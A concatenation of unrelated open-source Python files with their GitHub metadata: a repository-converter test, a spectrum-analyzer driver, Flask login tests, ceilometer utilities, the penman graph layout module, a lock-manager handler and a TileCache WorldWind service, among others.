def setUp(self):
repos_plugin = ReposPlugin()
mayer_plugin = ReposConverter()
mayer_plugin.setup_schemas(repos_plugin)
def _ingest_records(self,recordset):
self.errors = None
try:
system = System.objects.get(name="smra")
except System.DoesNotExist:
self.assertTrue(False)
try:
repository = Repository.objects.get(name="Mayer", system=system)
except Repository.DoesNotExist:
repository = Repository()
repository.name = "Mayer"
repository.system = system
repository.save()
repos_plugin = ReposPlugin()
repos_plugin.sys = System.objects.get(name=system)
repos_plugin.repos = Repository.objects.get(name=repository,
system=system)
res1 = NoClass()
res1.Mayer_recordset = []
res1.Mayer_recordset.append(recordset)
test_results = {"findall":res1}
from smra.smra_portal.repos.Mayer import ReposConverter
mayer_plugin = ReposConverter(fake=test_results)
mayer_plugin.setup_schemas(repos_plugin)
(new_objs,
new_objects_count,
result_count) = mayer_plugin.process_one_ws_call(repos_plugin)
self.assertEquals(new_objects_count, 1)
self.assertEquals(result_count, 1)
res = []
for obj in new_objs:
res.append("%s" % obj.description)
found_ingested = False
for param in MediaObjectParameter.objects.filter(paramset__media_object=obj):
res.append("type=%s name=%s val=%s" % (param.name.get_type_string(param.name.type),param.name.name,param.value))
res.sort()
self.errors = repos_plugin.errors
return (res,self.errors)
def test_simple(self):
"""
Test that we can connect to the AFI mock and pull and convert
single record
"""
recordset = ['foobar',{'TITLE':'foofoofoo',
'ID':'M 1000',
'Creation Date':'May 08, 2001',
'DE':'foo',
'BN':None}
]
(res,errors) = self._ingest_records(recordset)
self.assertEqual(str(res),
"['foofoofoo', u'type=LINK name=IMDB val=http://www.imdb.com/find?s=all&q=foofoofoo', u'type=LINK name=Link to Original Record val=http://afidb.adc.rmit.edu.au/dbtw-wpd/exec/dbtwpub.dll?AC=QBE_QUERY&TN=Mayer&RF=Full+record&NP=4&QY=ID+=+M+1000', u'type=STRING name=Collection val=Mayer', u'type=STRING name=ID val=M 1000', u'type=STRING name=Subject val=foo']"
)
self.assertEquals(errors,[])
| {
"content_hash": "3347f8e87dd2c428b546e93537452077",
"timestamp": "",
"source": "github",
"line_count": 96,
"max_line_length": 384,
"avg_line_length": 38.177083333333336,
"alnum_prop": 0.5778990450204639,
"repo_name": "tectronics/mavrec",
"id": "5963ebb27936bc5d2721a545fe945ca0b74abeb4",
"size": "5284",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "smra/smra_portal/tests/test_mayer.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "30199"
},
{
"name": "HTML",
"bytes": "42761"
},
{
"name": "JavaScript",
"bytes": "10786"
},
{
"name": "Python",
"bytes": "875078"
}
],
"symlink_target": ""
} |
"""
Python Interchangeable Virtual Instrument Library
Copyright (c) 2013-2016 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from .agilentBase8590E import *
class agilent8594Q(agilentBase8590E):
"Agilent 8594Q IVI spectrum analyzer driver"
def __init__(self, *args, **kwargs):
self.__dict__.setdefault('_instrument_id', 'HP8594Q')
super(agilent8594Q, self).__init__(*args, **kwargs)
self._input_impedance = 50
self._frequency_low = 9e3
self._frequency_high = 2.9e9
| {
"content_hash": "b538e62976c38f1df98e84e9cf9264cf",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 77,
"avg_line_length": 37.023809523809526,
"alnum_prop": 0.7401929260450161,
"repo_name": "Diti24/python-ivi",
"id": "6ffc8a6d9de82802e86e17ea986fa974d435d4aa",
"size": "1555",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ivi/agilent/agilent8594Q.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1992462"
}
],
"symlink_target": ""
} |
from flask import url_for
from flask_login import current_user
from werkzeug.exceptions import Unauthorized
from config import TRACKER_PASSWORD_LENGTH_MIN
from tracker.form.login import ERROR_ACCOUNT_DISABLED
from tracker.form.login import ERROR_INVALID_USERNAME_PASSWORD
from .conftest import DEFAULT_USERNAME
from .conftest import assert_logged_in
from .conftest import assert_not_logged_in
from .conftest import create_user
from .conftest import logged_in
def test_login_view(db, client):
resp = client.get(url_for('tracker.login'))
assert 200 == resp.status_code
@create_user
def test_login_success(db, client):
resp = client.post(url_for('tracker.login'), follow_redirects=True,
data=dict(username=DEFAULT_USERNAME, password=DEFAULT_USERNAME))
assert_logged_in(resp)
assert DEFAULT_USERNAME == current_user.name
@create_user
def test_login_invalid_credentials(db, client):
resp = client.post(url_for('tracker.login'), data={'username': DEFAULT_USERNAME,
'password': 'N' * TRACKER_PASSWORD_LENGTH_MIN})
assert_not_logged_in(resp, status_code=Unauthorized.code)
assert ERROR_INVALID_USERNAME_PASSWORD in resp.data.decode()
def test_login_invalid_form(db, client):
resp = client.post(url_for('tracker.login'), data={'username': DEFAULT_USERNAME})
assert_not_logged_in(resp, status_code=Unauthorized.code)
assert 'This field is required.' in resp.data.decode()
@create_user(active=False)
def test_login_disabled(db, client):
resp = client.post(url_for('tracker.login'), data={'username': DEFAULT_USERNAME, 'password': DEFAULT_USERNAME})
assert_not_logged_in(resp, status_code=Unauthorized.code)
assert ERROR_ACCOUNT_DISABLED in resp.data.decode()
@logged_in
def test_login_logged_in_redirect(db, client):
resp = client.post(url_for('tracker.login'), follow_redirects=False)
assert 302 == resp.status_code
assert resp.location.endswith('/')
@logged_in
def test_logout(db, client):
resp = client.post(url_for('tracker.logout'), follow_redirects=True)
assert_not_logged_in(resp)
def test_logout_not_logged_in(db, client):
resp = client.post(url_for('tracker.logout'), follow_redirects=False)
assert 302 == resp.status_code
assert resp.location.endswith('/')
| {
"content_hash": "04fcb1d48422f097255dcd7c50e678ed",
"timestamp": "",
"source": "github",
"line_count": 66,
"max_line_length": 115,
"avg_line_length": 35.333333333333336,
"alnum_prop": 0.7186963979416809,
"repo_name": "anthraxx/arch-security-tracker",
"id": "823917baa1bbdbf8b90c56b9d4288ae38df24a62",
"size": "2332",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/test_login.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "8344"
},
{
"name": "HTML",
"bytes": "48394"
},
{
"name": "Makefile",
"bytes": "443"
},
{
"name": "Python",
"bytes": "150444"
},
{
"name": "Shell",
"bytes": "540"
}
],
"symlink_target": ""
} |
import copy
from oslo_utils import timeutils
from six.moves.urllib import parse as urlparse
from ceilometer import sample
def get_metadata_from_host(host_url):
return {'resource_url': urlparse.urlunsplit(host_url)}
def make_resource_metadata(res_metadata=None, host_url=None):
resource_metadata = dict()
if res_metadata is not None:
metadata = copy.copy(res_metadata)
resource_metadata.update(metadata)
resource_metadata.update(get_metadata_from_host(host_url))
return resource_metadata
def make_sample_from_host(host_url, name, sample_type, unit, volume,
project_id=None, user_id=None, resource_id=None,
res_metadata=None, extra=None):
extra = extra or {}
resource_metadata = make_resource_metadata(res_metadata, host_url)
resource_metadata.update(extra)
res_id = resource_id or extra.get('resource_id') or host_url.hostname
return sample.Sample(
name='hardware.' + name,
type=sample_type,
unit=unit,
volume=volume,
user_id=user_id or extra.get('user_id'),
project_id=project_id or extra.get('project_id'),
resource_id=res_id,
timestamp=timeutils.isotime(),
resource_metadata=resource_metadata,
source='hardware',
)
| {
"content_hash": "63af74002f928e68f01a38b7e9bb2870",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 74,
"avg_line_length": 31.404761904761905,
"alnum_prop": 0.6588324488248674,
"repo_name": "yanheven/ceilometer",
"id": "61c2159edb97ba7ad42adfb90dc44af023ebee7c",
"size": "2072",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "ceilometer/hardware/pollsters/util.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2969045"
},
{
"name": "Shell",
"bytes": "4227"
}
],
"symlink_target": ""
} |
"""
Interpreting trees to graphs and configuring graphs to trees.
In order to serialize graphs into the PENMAN format, a tree-like
layout of the graph must be decided. Deciding a layout includes
choosing the order of the edges from a node and the paths to get to a
node definition (the position in the tree where a node's concept and
edges are specified). For instance, the following graphs for "The dog
barked loudly" have different edge orders on the ``b`` node::
(b / bark-01 (b / bark-01
:ARG0 (d / dog) :mod (l / loud)
:mod (l / loud)) :ARG0 (d / dog))
With re-entrancies, there are choices about which location of a
re-entrant node gets the full definition with its concept (node
label), etc. For instance, the following graphs for "The dog tried to
bark" have different locations for the definition of the ``d`` node::
(t / try-01 (t / try-01
:ARG0 (d / dog) :ARG0 d
:ARG1 (b / bark-01 :ARG1 (b / bark-01
:ARG0 d)) :ARG0 (d / dog))
With inverted edges, there are even more possibilities, such as::
(t / try-01 (t / try-01
:ARG0 (d / dog :ARG1 (b / bark-01
:ARG0-of b) :ARG0 (d / dog
:ARG1 (b / bark-01)) :ARG0-of t)))
This module introduces two epigraphical markers so that a pure graph
parsed from PENMAN can retain information about its tree layout
without altering its graph properties. The first marker type is
:class:`Push`, which is put on a triple to indicate that the triple
introduces a new node context, while the sentinel :data:`POP`
indicates that a triple is at the end of one or more node contexts.
These markers only work if the triples in the graph's data are
ordered. For instance, one of the graphs above (repeated here) has the
following data::
PENMAN Graph Epigraph
(t / try-01 [('t', ':instance', 'try-01'), :
:ARG0 (d / dog) ('t', ':ARG0', 'd'), : Push('d')
:ARG1 (b / bark-01 ('d', ':instance', 'dog'), : POP
:ARG0 d)) ('t', ':ARG1', 'b'), : Push('b')
('b', ':instance', 'bark-01'), :
('b', ':ARG0', 'd')] : POP
"""
from typing import Union, Mapping, Callable, Any, List, Set, cast
import copy
import logging
from penman.exceptions import LayoutError
from penman.types import (Variable, Role, BasicTriple, Branch, Node)
from penman.epigraph import Epidatum
from penman.surface import (Alignment, RoleAlignment)
from penman.tree import (Tree, is_atomic)
from penman.graph import (Graph, CONCEPT_ROLE)
from penman.model import Model
logger = logging.getLogger(__name__)
_default_model = Model()
_Nodemap = Mapping[Variable, Union[Node, None]]
# Epigraphical markers
class LayoutMarker(Epidatum):
"""Epigraph marker for layout choices."""
class Push(LayoutMarker):
"""Epigraph marker to indicate a new node context."""
__slots__ = 'variable',
def __init__(self, variable):
self.variable = variable
def __repr__(self):
return f'Push({self.variable})'
class Pop(LayoutMarker):
"""Epigraph marker to indicate the end of a node context."""
__slots__ = ()
def __repr__(self):
return 'POP'
#: A singleton instance of :class:`Pop`.
POP = Pop()
# Tree to graph interpretation ################################################
def interpret(t: Tree, model: Model = None) -> Graph:
"""
Interpret tree *t* as a graph using *model*.
Tree interpretation is the process of transforming the nodes and
edges of a tree into a directed graph. A semantic model determines
which edges are inverted and how to deinvert them. If *model* is
not provided, the default model will be used.
Args:
t: the :class:`~penman.tree.Tree` to interpret
model: the :class:`~penman.model.Model` used to interpret *t*
Returns:
The interpreted :class:`~penman.graph.Graph`.
Example:
>>> from penman.tree import Tree
>>> from penman import layout
>>> t = Tree(
... ('b', [
... ('/', 'bark-01'),
... ('ARG0', ('d', [
... ('/', 'dog')]))]))
>>> g = layout.interpret(t)
>>> for triple in g.triples:
... print(triple)
...
('b', ':instance', 'bark-01')
('b', ':ARG0', 'd')
('d', ':instance', 'dog')
"""
if model is None:
model = _default_model
variables = {v for v, _ in t.nodes()}
top, triples, epidata = _interpret_node(t.node, variables, model)
epimap = {}
for triple, epis in epidata:
if triple in epimap:
logger.warning(
f'ignoring epigraph data for duplicate triple: {triple}'
)
else:
epimap[triple] = epis
g = Graph(triples, top=top, epidata=epimap, metadata=t.metadata)
logger.info('Interpreted: %s', g)
return g
def _interpret_node(t: Node, variables: Set[Variable], model: Model):
has_concept = False
triples = []
epidata = []
var, edges = t
for role, target in edges:
epis: List[Epidatum] = []
role, role_epis = _process_role(role)
epis.extend(role_epis)
has_concept |= role == CONCEPT_ROLE
# atomic targets
if is_atomic(target):
target, target_epis = _process_atomic(target)
epis.extend(target_epis)
triple = (var, role, target)
if model.is_role_inverted(role):
if target in variables:
triple = model.invert(triple)
else:
logger.warning('cannot deinvert attribute: %r', triple)
triples.append(triple)
epidata.append((triple, epis))
# nested nodes
else:
triple = model.deinvert((var, role, target[0]))
triples.append(triple)
epis.append(Push(target[0]))
epidata.append((triple, epis))
# recurse to nested nodes
_, _triples, _epis = _interpret_node(target, variables, model)
triples.extend(_triples)
_epis[-1][1].append(POP) # POP from last triple of nested node
epidata.extend(_epis)
if not has_concept:
instance = (var, CONCEPT_ROLE, None)
triples.insert(0, instance)
epidata.append((instance, []))
return var, triples, epidata
def _process_role(role):
epis = ()
if role == '/':
role = CONCEPT_ROLE
elif '~' in role:
role, _, alignment = role.partition('~')
epis = (RoleAlignment.from_string(alignment),)
return role, epis
def _process_atomic(target):
epis = ()
# remove any alignments
if target and '~' in target:
if target.startswith('"'):
# need to handle alignments on strings differently
# because strings may contain ~ inside the quotes (e.g., URIs)
pivot = target.rindex('"') + 1
if pivot < len(target):
epis = (Alignment.from_string(target[pivot:]),)
target = target[:pivot]
else:
target, _, alignment = target.partition('~')
epis = (Alignment.from_string(alignment),)
return target, epis
# Graph to tree configuration #################################################
def configure(g: Graph,
top: Variable = None,
model: Model = None) -> Tree:
"""
Create a tree from a graph by making as few decisions as possible.
A graph interpreted from a valid tree using :func:`interpret` will
contain epigraphical markers that describe how the triples of a
graph are to be expressed in a tree, and thus configuring this
tree requires only a single pass through the list of triples. If
the markers are missing or out of order, or if the graph has been
modified, then the configuration process will have to make
decisions about where to insert tree branches. These decisions are
deterministic, but may result in a tree different than the one
expected.
Args:
g: the :class:`~penman.graph.Graph` to configure
top: the variable to use as the top of the graph; if ``None``,
the top of *g* will be used
model: the :class:`~penman.model.Model` used to configure the
tree
Returns:
The configured :class:`~penman.tree.Tree`.
Example:
>>> from penman.graph import Graph
>>> from penman import layout
>>> g = Graph([('b', ':instance', 'bark-01'),
... ('b', ':ARG0', 'd'),
... ('d', ':instance', 'dog')])
>>> t = layout.configure(g)
>>> print(t)
Tree(
('b', [
('/', 'bark-01'),
(':ARG0', ('d', [
('/', 'dog')]))]))
"""
if model is None:
model = _default_model
node, data, nodemap = _configure(g, top, model)
# remove any superfluous POPs at the end (maybe from dereification)
while data and isinstance(data[-1], Pop):
data.pop()
# if any data remain, the graph was not properly annotated for a tree
skipped: List[BasicTriple] = []
while data:
_skipped, var, data = _find_next(data, nodemap)
skipped.extend(_skipped)
data_count = len(data)
if var is None or data_count == 0:
raise LayoutError('possibly disconnected graph')
_, surprising = _configure_node(var, data, nodemap, model)
if len(data) == data_count and surprising:
skipped.insert(0, data.pop())
elif len(data) >= data_count:
raise LayoutError('unknown configuration error')
else:
data = skipped + data
skipped.clear()
# remove any superfluous POPs
while data and isinstance(data[-1], Pop):
data.pop()
if skipped:
raise LayoutError('incomplete configuration')
_process_epigraph(node)
tree = Tree(node, metadata=g.metadata)
logger.debug('Configured: %s', tree)
return tree
def _configure(g, top, model):
"""
Create the tree that can be created without any improvising.
"""
if len(g.triples) == 0:
return (g.top, []), [], {}
nodemap: _Nodemap = {var: None for var in g.variables()}
if top is None:
top = g.top
if top not in nodemap:
raise LayoutError(f'top is not a variable: {top!r}')
nodemap[top] = (top, [])
data = list(reversed(_preconfigure(g, model)))
node, _ = _configure_node(top, data, nodemap, model)
return node, data, nodemap
def _preconfigure(g, model):
"""
Arrange the triples and epidata for ordered traversal.
Also perform some basic validation.
"""
data = []
epidata = g.epidata
pushed = set()
for triple in g.triples:
var, role, target = triple
epis, push, pops = [], False, []
for epi in epidata.get(triple, []):
if isinstance(epi, Push):
pvar = epi.variable
if pvar in pushed:
logger.warning(
f"ignoring secondary node contexts for '{pvar}'"
)
continue # change to 'pass' to allow multiple contexts
if pvar not in (var, target) or role == CONCEPT_ROLE:
logger.warning(
f"node context '{pvar}' invalid for triple: {triple!r}"
)
continue
if pvar == var:
triple = model.invert(triple)
pushed.add(pvar)
push = True
elif isinstance(epi, Pop):
pops.append(epi)
else:
epis.append(epi)
data.append((triple, push, epis))
data.extend(pops)
return data
def _configure_node(var, data, nodemap, model):
"""
Configure a node and any descendants.
Side-effects:
* *data* is modified
* *nodemap* is modified
"""
node = nodemap[var]
edges = node[1]
# Something is 'surprising' when a triple doesn't predictably fit
# given the current state
surprising = False
while data:
datum = data.pop()
if isinstance(datum, Pop):
break
triple, push, epis = datum
# Finalize triple orientation
if triple[0] == var:
_, role, target = triple # expected situation
elif triple[2] == var and triple[1] != CONCEPT_ROLE:
_, role, target = model.invert(triple) # unexpected inversion
push = False # preconfigured push site may no longer be valid
surprising = True
else:
data.append(datum) # cannot place triple
surprising = True
break
# Insert into tree, recursively configuring nodes
if role == CONCEPT_ROLE:
if not target:
continue # prefer (a) over (a /) when concept is missing
edges.insert(0, ('/', target, epis))
else:
if push:
nodemap[target] = (target, [])
target, _surprising = _configure_node(
target, data, nodemap, model
)
surprising &= _surprising
elif target in nodemap and nodemap[target] is None:
nodemap[target] = node # site of potential node context
edges.append((role, target, epis))
return node, surprising
def _find_next(data, nodemap):
"""
Find the next node context; establish if necessary.
"""
var = None
for i in range(len(data) - 1, -1, -1):
datum = data[i]
if isinstance(datum, Pop):
continue
source, _, target = datum[0]
if source in nodemap and _get_or_establish_site(source, nodemap):
var = source
break
elif target in nodemap and _get_or_establish_site(target, nodemap):
var = target
break
pivot = i + 1
return data[pivot:], var, data[:pivot]
def _get_or_establish_site(var, nodemap):
"""
Turn a variable target into a node context.
"""
# first check if the var is available at all
if nodemap[var] is not None:
_var, edges = nodemap[var]
# if the mapped node's var doesn't match it can be established
if var != _var:
node = (var, [])
nodemap[var] = node
for i in range(len(edges)):
# replace the variable in the tree with the new node
if edges[i][1] == var and edges[i][0] != '/':
edge = list(edges[i])
edge[1] = node
edges[i] = tuple(edge)
break
else:
pass # otherwise the node already exists so we're good
return True
# var is not yet available
return False
def _process_epigraph(node):
"""Format epigraph data onto roles and targets."""
_, edges = node
for i, (role, target, epis) in enumerate(edges):
atomic_target = is_atomic(target)
for epi in epis:
if epi.mode == 1: # role epidata
role = f'{role!s}{epi!s}'
elif epi.mode == 2 and atomic_target: # target epidata
target = f'{target!s}{epi!s}'
else:
logger.warning('epigraphical marker ignored: %r', epi)
if not atomic_target:
_process_epigraph(target)
edges[i] = (role, target)
def reconfigure(g: Graph,
top: Variable = None,
model: Model = None,
key: Callable[[Role], Any] = None) -> Tree:
"""
Create a tree from a graph after any discarding layout markers.
If *key* is provided, triples are sorted according to the key.
"""
p = copy.deepcopy(g)
for epilist in p.epidata.values():
epilist[:] = [epi for epi in epilist
if not isinstance(epi, LayoutMarker)]
if key is not None:
# function def because mypy doesn't like key in lambda
def _key(triple):
return key(triple[1])
p.triples.sort(key=_key)
return configure(p, top=top, model=model)
def rearrange(t: Tree,
key: Callable[[Role], Any] = None,
attributes_first: bool = False) -> None:
"""
Sort the branches at each node in tree *t* according to *key*.
Each node in a tree contains a list of branches. This function
sorts those lists in-place using the *key* function, which accepts
a role and returns some sortable criterion.
If the *attributes_first* argument is ``True``, attribute branches
are appear before any edges.
Instance branches (``/``) always appear before any other branches.
Example:
>>> from penman import layout
>>> from penman.model import Model
>>> from penman.codec import PENMANCodec
>>> c = PENMANCodec()
>>> t = c.parse(
... '(s / see-01'
... ' :ARG1 (c / cat)'
... ' :ARG0 (d / dog))')
>>> layout.rearrange(t, key=Model().canonical_order)
>>> print(c.format(t))
(s / see-01
:ARG0 (d / dog)
:ARG1 (c / cat))
"""
if attributes_first:
variables = {node[0] for node in t.nodes()}
else:
variables = set()
def sort_key(branch: Branch):
role, target = branch
if is_atomic(target):
criterion1 = target in variables
else:
criterion1 = target[0] in variables
criterion2 = True if key is None else key(role)
return (criterion1, criterion2)
_rearrange(t.node, sort_key)
def _rearrange(node: Node, key: Callable[[Branch], Any]) -> None:
_, branches = node
if branches and branches[0][0] == '/':
first = branches[0:1]
rest = branches[1:]
else:
first = []
rest = branches[:]
for _, target in rest:
if not is_atomic(target):
_rearrange(target, key=key)
branches[:] = first + sorted(rest, key=key)
def get_pushed_variable(g: Graph,
triple: BasicTriple) -> Union[Variable, None]:
"""
Return the variable pushed by *triple*, if any, otherwise ``None``.
Example:
>>> from penman import decode
>>> from penman.layout import get_pushed_variable
>>> g = decode('(a / alpha :ARG0 (b / beta))')
>>> get_pushed_variable(g, ('a', ':instance', 'alpha')) # None
>>> get_pushed_variable(g, ('a', ':ARG0', 'b'))
'b'
"""
for epi in g.epidata[triple]:
if isinstance(epi, Push):
return epi.variable
return None
def appears_inverted(g: Graph, triple: BasicTriple) -> bool:
"""
Return ``True`` if *triple* appears inverted in serialization.
More specifically, this function returns ``True`` if *triple* has
a :class:`Push` epigraphical marker in graph *g* whose associated
variable is the source variable of *triple*. This should be
accurate when testing a triple in a graph interpreted using
:func:`interpret` (including :meth:`PENMANCodec.decode
<penman.codec.PENMANCodec.decode>`, etc.), but it does not
guarantee that a new serialization of *g* will express *triple* as
inverted as it can change if the graph or its epigraphical markers
are modified, if a new top is chosen, etc.
Args:
g: a :class:`~penman.graph.Graph` containing *triple*
triple: the triple that does or does not appear inverted
Returns:
``True`` if *triple* appears inverted in graph *g*.
"""
variables = g.variables()
if triple[1] == CONCEPT_ROLE or triple[2] not in variables:
# attributes and instance triples should never be inverted
return False
else:
# edges may appear inverted...
variable = get_pushed_variable(g, triple)
if variable is not None:
# ... when their source is pushed
return variable == triple[0]
else:
# ... or when their target is the current node context
for variable, _triple in zip(node_contexts(g), g.triples):
if variable is None:
break # we can no longer guess the node context
elif _triple == triple:
return triple[2] == variable
return False
def node_contexts(g: Graph) -> List[Union[Variable, None]]:
"""
Return the list of node contexts corresponding to triples in *g*.
If a node context is unknown, the value ``None`` is substituted.
Example:
>>> from penman import decode, layout
>>> g = decode('''
... (a / alpha
... :attr val
... :ARG0 (b / beta :ARG0 (g / gamma))
... :ARG0-of g)''')
>>> for ctx, trp in zip(layout.node_contexts(g), g.triples):
... print(ctx, ':', trp)
...
a : ('a', ':instance', 'alpha')
a : ('a', ':attr', 'val')
a : ('a', ':ARG0', 'b')
b : ('b', ':instance', 'beta')
b : ('b', ':ARG0', 'g')
g : ('g', ':instance', 'gamma')
a : ('g', ':ARG0', 'a')
"""
variables = g.variables()
stack = [g.top]
contexts: List[Union[Variable, None]] = [None] * len(g.triples)
for i, triple in enumerate(g.triples):
eligible: List[Variable] = [triple[0]]
if triple[1] != CONCEPT_ROLE and triple[2] in variables:
eligible.append(cast(Variable, triple[2]))
if stack[-1] not in eligible:
break
else:
contexts[i] = stack[-1]
pushed = get_pushed_variable(g, triple)
if pushed:
stack.append(pushed)
try:
for epi in g.epidata[triple]:
if isinstance(epi, Pop):
stack.pop()
except IndexError:
break # more POPs than contexts in stack
return contexts
| {
"content_hash": "9c50be41f8d69399ef0bb8e15c4290a9",
"timestamp": "",
"source": "github",
"line_count": 670,
"max_line_length": 79,
"avg_line_length": 33.17462686567164,
"alnum_prop": 0.5581499977504837,
"repo_name": "goodmami/penman",
"id": "fc569dd3d9c7afc6efe70b29b21d1c9c8af2815b",
"size": "22252",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "penman/layout.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "186533"
}
],
"symlink_target": ""
} |
import subprocess
from shlex import split
import sys
CGI = 'http://lain.sfc.wide.ad.jp/qkd/result.cgi'
cmd = "wget -q -O - --no-check-certificate --post-data 'result=" + sys.argv[1] + "' " + CGI
subprocess.call( split(cmd) )
| {
"content_hash": "c01e2a67a87741147fba2e7d93efc1ab",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 91,
"avg_line_length": 28.375,
"alnum_prop": 0.6740088105726872,
"repo_name": "iomz/qkd-laser-experiment",
"id": "a3d720745c71d9466467b81fe55e6f8861450909",
"size": "244",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "prototype/carol/lain_post.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "28770"
},
{
"name": "Python",
"bytes": "28509"
}
],
"symlink_target": ""
} |
from rdlm.request_handler import RequestHandler, admin_authenticated
from rdlm.lock import LOCK_MANAGER_INSTANCE
from rdlm.hal import Resource
class ResourceHandler(RequestHandler):
"""Class which handles the /resources/[resource] URL"""
SUPPORTED_METHODS = ['GET', 'DELETE']
@admin_authenticated
def delete(self, name):
'''
@summary: deals with DELETE request (deleting the given resource)
@param name: name of the resource
'''
res = LOCK_MANAGER_INSTANCE.remove_resource(name)
if res:
self.send_status(204)
else:
self.send_error(404, message="no resource (with locks) found")
@admin_authenticated
def get(self, name):
'''
@summary: deals with GET request (getting a JSON HAL of the resource)
@param name: name of the resource
'''
tmp = LOCK_MANAGER_INSTANCE.get_resource_as_dict(name)
resource = Resource(self.reverse_url("resource", name), {"name": name})
if tmp:
for lock_dict in tmp['locks']:
lock = Resource(self.reverse_url("lock", name, lock_dict['uid']), lock_dict)
resource.add_embedded_resource("locks", lock)
self.set_header("Content-Type", "application/hal+json")
self.finish(resource.to_json())
| {
"content_hash": "91486d1cbb60e9567c583b9a28ce3a69",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 92,
"avg_line_length": 37.05555555555556,
"alnum_prop": 0.6251874062968515,
"repo_name": "thefab/restful-distributed-lock-manager",
"id": "04d58c7bf063c361a51f94804c5b06f41b64233d",
"size": "1516",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rdlm/resource_handler.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "53356"
}
],
"symlink_target": ""
} |
from TileCache.Service import Request, Capabilities
import TileCache.Layer as Layer
class WorldWind (Request):
def parse (self, fields, path, host):
param = {}
for key in ['t', 'l', 'x', 'y', 'request']:
if fields.has_key(key.upper()):
param[key] = fields[key.upper()]
elif fields.has_key(key):
param[key] = fields[key]
else:
param[key] = ""
if param["request"] == "GetCapabilities" or param["request"] == "metadata":
return self.getCapabilities(host + path, param)
else:
return self.getMap(param)
def getMap (self, param):
layer = self.getLayer(param["t"])
level = int(param["l"])
y = float(param["y"])
x = float(param["x"])
tile = Layer.Tile(layer, x, y, level)
return tile
def getCapabilities (self, host, param):
metadata = self.service.metadata
if "description" in metadata:
description = metadata["description"]
else:
description = ""
formats = {}
for layer in self.service.layers.values():
formats[layer.format()] = 1
formats = formats.keys()
xml = """<?xml version="1.0" encoding="UTF-8" ?>
<LayerSet Name="TileCache" ShowAtStartup="true" ShowOnlyOneLayers="false">
"""
for name, layer in self.service.layers.items():
if (layer.srs != "EPSG:4326"): continue
xml += """
<ChildLayerSet Name="%s" ShowAtStartup="false" ShowOnlyOneLayer="true">
<QuadTileSet ShowAtStartup="true">
<Name>%s</Name>
<Description>Layer: %s</Description>
<DistanceAboveSurface>0</DistanceAboveSurface>
<BoundingBox>
<West><Value>%s</Value></West>
<South><Value>%s</Value></South>
<East><Value>%s</Value></East>
<North><Value>%s</Value></North>
</BoundingBox>
<TerrainMapped>false</TerrainMapped>
<!-- I have no clue what this means. -->
<ImageAccessor>
<LevelZeroTileSizeDegrees>%s</LevelZeroTileSizeDegrees>
<NumberLevels>%s</NumberLevels>
<TextureSizePixels>%s</TextureSizePixels>
<ImageFileExtension>%s</ImageFileExtension>
<ImageTileService>
<ServerUrl>%s</ServerUrl>
<DataSetName>%s</DataSetName>
</ImageTileService>
</ImageAccessor>
<ExtendedInformation>
<Abstract>SRS:%s</Abstract>
<!-- WorldWind doesn't have any place to store the SRS -->
</ExtendedInformation>
</QuadTileSet>
</ChildLayerSet>
""" % (name, name, layer.description, float(layer.bbox[0]), float(layer.bbox[1]),
float(layer.bbox[2]), float(layer.bbox[3]), layer.resolutions[0] * layer.size[0],
len(layer.resolutions), layer.size[0], layer.extension, host,
name, layer.srs)
xml += """
</LayerSet>"""
return Capabilities("text/xml", xml)
| {
"content_hash": "842c19c4537d60684800a9be641c71df",
"timestamp": "",
"source": "github",
"line_count": 88,
"max_line_length": 105,
"avg_line_length": 39.06818181818182,
"alnum_prop": 0.4985456660849331,
"repo_name": "pcucurullo/groot",
"id": "665adc37d38968429c6bd3eb07c99b4b1269d71d",
"size": "3502",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "public/cgi/TileCache/Services/WorldWind.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "ApacheConf",
"bytes": "2870"
},
{
"name": "C",
"bytes": "7006"
},
{
"name": "CSS",
"bytes": "7538133"
},
{
"name": "HTML",
"bytes": "49958485"
},
{
"name": "JavaScript",
"bytes": "60060170"
},
{
"name": "Makefile",
"bytes": "2100"
},
{
"name": "PHP",
"bytes": "4381269"
},
{
"name": "PLpgSQL",
"bytes": "30016"
},
{
"name": "Python",
"bytes": "344097"
},
{
"name": "SQLPL",
"bytes": "17423"
},
{
"name": "Shell",
"bytes": "15692"
},
{
"name": "XSLT",
"bytes": "2204"
}
],
"symlink_target": ""
} |
import configparser
config = configparser.ConfigParser()
